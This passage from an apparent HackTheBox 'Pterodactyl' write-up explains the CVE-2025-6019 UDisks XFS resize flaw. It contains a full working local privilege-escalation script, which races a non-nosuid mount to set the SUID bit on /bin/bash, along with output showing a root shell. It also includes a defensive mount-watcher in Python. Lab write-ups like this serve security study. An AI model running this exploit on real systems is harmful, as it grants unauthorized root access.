= sectsz=512 sunit=0 blks, lazy-count=1
realtime =none extsz=4096 blocks=0, rtextents=0
= rgcount=0 rgsize=0 extents
= zoned=0 start=0 reserved=0
[+] 300 MB XFS image created: ./xfs.image
[*] Transfer to target with: scp xfs.image <user>@<host>:

Upload the image to the target.

If the upload is too slow, zip it first and upload the archive.

┌──(root㉿kaada)-[/home/kali/Desktop/Pterodactyl/CVE-2025-6019-main]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.252.208 - - [08/Feb/2026 20:52:04] "GET /xfs.image HTTP/1.1" 200 -

The upload took close to an hour; fortunately this is a retrospective write-up. Writing it up live during a real engagement would have been hopeless.

Step 2: executing the escalation (CVE-2025-6019)

Core issue: UDisks does not disable SUID during an XFS Resize operation.

  1. Background: the nosuid mount option prevents setuid binaries on a mounted filesystem from executing with their owner's privileges. When an unprivileged user mounts a disk, the system normally forces nosuid on.
  2. Vulnerability: libblockdev/udisks has a logic flaw when handling an XFS filesystem resize request. To resize the filesystem, the service must temporarily mount the device, but it does not enforce the nosuid option on that mount.
  3. Attack steps:
    • Preparation: the attacker builds a malicious XFS image file (xfs.image) locally and plants a malicious SUID program in it (or, as in the write-up's script, prepares the environment and waits for the mount).
    • Trigger: the attacker sends a Filesystem.Resize call to UDisks2 over D-Bus. Because CVE-2025-6018 has already been exploited, the request is authorized.
    • Race condition: the system temporarily mounts the image (with SUID honoured). The script in the write-up uses this brief window to run the malicious program inside the image, or to use the mount point, and executes chmod u+s /bin/bash.
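As an added example (not the write-up's or the PoC's code) for the CVE-2025-6019 behaviour described in the overview and in Step 2: a Python watcher that repeatedly samples /proc/mounts, reports loop-device mounts that lack nosuid, and lists the setuid files inside them. Because the resize mount is transient, the point is the polling, not a single snapshot. The mount-table snapshots are constructed; the /tmp/blockdev* path pattern comes from the write-up's script.

```python
import os
import stat
import time
from typing import Callable, Dict, List, Set

# Constructed /proc/mounts snapshots (not from the original write-up): the steady
# state, the same table while a loop device sits on the temporary /tmp/blockdev*
# path the write-up's script targets (mounted without nosuid), and the steady state again.
BASE = ("/dev/sda2 / xfs rw,relatime,attr2,inode64 0 0\n"
        "/dev/sdb1 /run/media/alice/USB vfat rw,nosuid,nodev,relatime 0 0\n")
SAMPLE_SNAPSHOTS = [BASE,
                    BASE + "/dev/loop0 /tmp/blockdev.ABC123 xfs rw,relatime,attr2,inode64 0 0\n",
                    BASE]


def parse_mounts(text: str) -> List[Dict[str, object]]:
    """Parse /proc/mounts text into dicts of device, mountpoint, fstype and an option set."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        rows.append({"device": parts[0],
                     "mountpoint": parts[1].replace("\\040", " "),  # kernel escapes spaces
                     "fstype": parts[2],
                     "options": set(parts[3].split(","))})
    return rows


def risky_mounts(rows: List[Dict[str, object]]) -> List[str]:
    """Mountpoints of loop-device or /tmp/blockdev* mounts that were not given nosuid."""
    out = []
    for r in rows:
        loopish = r["device"].startswith("/dev/loop") or r["mountpoint"].startswith("/tmp/blockdev")
        if loopish and "nosuid" not in r["options"]:
            out.append(r["mountpoint"])
    return out


def setuid_files(root: str) -> List[str]:
    """Regular files under root carrying the setuid bit: the payload nosuid would neutralise."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return sorted(hits)


def watch_mounts(read_mounts: Callable[[], str], rounds: int, interval: float = 0.05) -> Set[str]:
    """Poll the mount table `rounds` times and collect every risky mountpoint seen.

    The resize mount exists only for the duration of the operation, so a single
    snapshot usually misses it; repeated sampling is what catches the window."""
    seen = set()
    for _ in range(rounds):
        seen.update(risky_mounts(parse_mounts(read_mounts())))
        if interval:
            time.sleep(interval)
    return seen


def read_proc_mounts() -> str:
    with open("/proc/mounts") as fh:
        return fh.read()


if __name__ == "__main__":
    # Sample the live mount table for about 10 s; report transient SUID-capable loop mounts.
    for mountpoint in sorted(watch_mounts(read_proc_mounts, rounds=200)):
        print("nosuid missing on", mountpoint, "setuid files:", setuid_files(mountpoint))
```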

Once the upload completes, use the script to escalate.

#!/bin/bash

# 1. Environment cleanup
killall -KILL gvfs-udisks2-volume-monitor 2>/dev/null

echo "[*] Setting up loop device..."
# Make sure an absolute path is used
IMAGE_PATH="$(pwd)/xfs.image"
OUTPUT=$(udisksctl loop-setup --file "$IMAGE_PATH" --no-user-interaction)
LOOP_DEV=$(echo "$OUTPUT" | awk '{print $NF}' | tr -d '.')

if [ -z "$LOOP_DEV" ]; then
    echo "[-] Failed to setup loop device."
    exit 1
fi

LOOP_NAME=$(basename "$LOOP_DEV")
echo "[+] Loop device created: $LOOP_DEV"

# 2. Start the race loop
# Goal: use the root privileges available through the temporary mount point
# to set the SUID bit on the system's /bin/bash
echo "[*] Starting race loop to chmod /bin/bash..."

(
    while true; do
        # Core payload:
        # run the chmod command through the mounted bash with -c
        # 2>/dev/null silences errors so the attempts are quiet
        /tmp/blockdev*/bash -p -c "chmod u+s /bin/bash" 2>/dev/null

        # Check whether /bin/bash already has the SUID bit (-u test)
        # and leave the loop once it does
        if [ -u /bin/bash ]; then
            break
        fi
    done
) &
PID=$!

# Give the background process a moment to start
sleep 0.5

# 3. Trigger the vulnerability
echo "[*] Triggering Filesystem.Resize..."
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path /org/freedesktop/UDisks2/block_devices/"$LOOP_NAME" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}' >/dev/null 2>&1

# 4. Verify and drop into a shell
sleep 1
# Stop the background loop
kill "$PID" 2>/dev/null

echo "[*] Checking permissions..."
if [ -u /bin/bash ]; then
    echo ""
    echo "[+] SUCCESS! /bin/bash is now SUID."
    ls -l /bin/bash

    echo "[+] Spawning persistent root shell..."
    # From now on this single command is enough to get root
    /bin/bash -p
else
    echo "[-] Failed to set SUID bit. Try running the script again."
    # Clean up the loop device on failure so the script can be re-run
    udisksctl loop-delete -b "$LOOP_DEV" 2>/dev/null
fi
phileasfogg3@pterodactyl:~> vim make_suid.sh
phileasfogg3@pterodactyl:~> chmod +x make_suid.sh
phileasfogg3@pterodactyl:~> ./make_suid.sh
[*] Setting up loop device...
[+] Loop device created: /dev/loop0
[*] Starting race loop to chmod /bin/bash...
[*] Triggering Filesystem.Resize...
[*] Checking permissions...

[+] SUCCESS! /bin/bash is now SUID.
lrwxrwxrwx 1 root root 13 Aug 22 2024 /bin/bash -> /usr/bin/bash
[+] Spawning persistent root shell...
bash-4.4# id
uid=1002(phileasfogg3) gid=100(users) euid=0(root) groups=100(users)
bash-4.4#

Note: the script relies on /tmp/blockdev*/bash (the bash inside the mount point) to run the command. Because the mount is not made with nosuid, if that bash was set SUID root beforehand, the chmod it runs executes with root privileges.

Attack flow: Internet -> HTTP (80) -> Info Leak (Laravel) -> MySQL Creds -> LFI (PEAR) -> RCE (wwwrun) -> DB Dump -> SSH (phileasfogg3) -> PAM/UDisks Exploit -> ROOT.


Author: Skyarrow
Posted on: February 9, 2026
http://example.com/2026/02/09/HackTheBox-Pterodactyl/